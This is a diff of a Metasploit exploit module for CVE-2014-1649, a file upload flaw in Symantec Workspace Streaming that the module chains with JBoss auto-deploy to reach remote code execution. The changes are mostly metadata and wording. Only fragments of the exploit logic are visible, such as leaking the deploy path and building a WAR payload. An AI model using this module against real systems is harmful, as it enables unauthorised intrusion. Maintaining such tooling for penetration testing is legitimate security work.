@@ -15,15 +15,16 @@ class Metasploit3 < Msf::Exploit::Remote
15
15
16
16
def initialize ( info = { } )
17
17
super ( update_info ( info ,
18
- 'Name' => 'Symantec Workspace Streaming Arbitrary File Upload' ,
18
+ 'Name' => 'Symantec Workspace Streaming ManagementAgentServer.putFile XMLRPC Request Arbitrary File Upload' ,
19
19
'Description' => %q{
20
20
This module exploits a code execution flaw in Symantec Workspace Streaming. The
21
21
vulnerability exists in the ManagementAgentServer.putFile XMLRPC call exposed by the
22
22
as_agent.exe service, which allows for uploading arbitrary files under the server root.
23
23
This module abuses the auto deploy feature in the JBoss as_ste.exe instance in order
24
24
to achieve remote code execution. This module has been tested successfully on Symantec
25
- Workspace Streaming 6.1 SP8 and Windows 2003 SP2. Abused services listen on a single
26
- machine deployment, and also in the backend role in a multiple machine deployment.
25
+ Workspace Streaming 6.1 SP8 and Windows 2003 SP2, and reported to affect 7.5.0.x.
26
+ Abused services listen on a single-machine deployment and also in the backend role in
27
+ a multiple-machine deployment.
27
28
} ,
28
29
'Author' =>
29
30
[
@@ -35,6 +36,7 @@ def initialize(info = {})
35
36
[
36
37
[ 'CVE' , '2014-1649' ] ,
37
38
[ 'BID' , '67189' ] ,
39
+ [ 'OSVDB' , '106923' ] ,
38
40
[ 'ZDI' , '14-127' ] ,
39
41
[ 'URL' , 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140512_00' ]
40
42
] ,
@@ -51,7 +53,7 @@ def initialize(info = {})
51
53
register_options (
52
54
[
53
55
Opt ::RPORT ( 9855 ) , # as_agent.exe (afuse XMLRPC to upload arbitrary file)
54
- OptPort . new ( 'STE_PORT' , [ true , "The remote as_ste.exe AS server port" , 9832 ] ) , # as_ste.exe (abuse jboss auto deploy)
56
+ OptPort . new ( 'STE_PORT' , [ true , "The remote as_ste.exe AS server port" , 9832 ] ) , # as_ste.exe (abuse JBoss auto deploy)
55
57
] , self . class )
56
58
end
57
59
@@ -227,11 +229,11 @@ def check
227
229
end
228
230
229
231
def exploit
230
- print_status ( "#{ peer } - Leaking the jboss deployment directory..." )
232
+ print_status ( "#{ peer } - Leaking the JBoss deployment directory..." )
231
233
jboss_path = jboss_deploy_path
232
234
233
235
if jboss_path . nil?
234
- fail_with ( Failure ::Unknown , "#{ peer } - Failed to disclose the jboss deployment directory" )
236
+ fail_with ( Failure ::Unknown , "#{ peer } - Failed to disclose the JBoss deployment directory" )
235
237
end
236
238
237
239
print_status ( "#{ peer } - Building WAR payload..." )
0 commit comments